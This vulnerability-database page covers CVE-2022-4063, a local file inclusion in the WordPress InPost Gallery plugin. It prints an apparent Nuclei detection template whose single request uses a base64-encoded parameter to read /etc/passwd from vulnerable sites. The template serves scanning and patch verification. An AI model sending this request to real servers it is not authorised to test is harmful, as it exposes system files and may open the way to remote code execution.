Vulners
Lucene search
WordPress InPost Gallery <2.1.4.1 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2022-4063 | 19 Dec 202216:10 | – | circl |
 | WordPress plugin InPost Gallery 路径遍历漏洞 | 19 Dec 202200:00 | – | cnnvd |
 | CVE-2022-4063 | 19 Dec 202213:41 | – | cve |
 | CVE-2022-4063 InPost Gallery < 2.1.4.1 - Unauthenticated LFI to RCE | 19 Dec 202213:41 | – | cvelist |
 | CVE-2022-4063 | 19 Dec 202214:15 | – | nvd |
 | CVE-2022-4063 | 19 Dec 202214:15 | – | osv |
 | Design/Logic Flaw | 19 Dec 202214:15 | – | prion |
 | PT-2022-25427 · WordPress · Inpost Gallery | 19 Dec 202200:00 | – | ptsecurity |
 | CVE-2022-4063 | 22 May 202523:04 | – | redhatcve |
 | VulnCheck KEV: CVE-2022-4063 | 13 Nov 202300:00 | – | vulncheck_kev |
10
id: CVE-2022-4063
info:
name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion
author: theamanrawat
severity: critical
description: |
WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.
impact: |
The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.
remediation: Fixed in version 2.1.4.1.
reference:
- https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7
- https://wordpress.org/plugins/inpost-gallery/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4063
- https://github.com/cyllective/CVEs
- https://github.com/im-hanzou/INPGer
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4063
cwe-id: CWE-22
epss-score: 0.09519
epss-percentile: 0.94827
cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: pluginus
product: inpost_gallery
framework: wordpress
tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402206c2c23c11a31ecd7d1b9b8e5bdffc37c5f9c8899856bcef57efcba7cd5acd49102205106e800251f6e5fc973c5a98c47bee61f7a69a2e03914555cdd3718b6827b44:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.09519
SSVC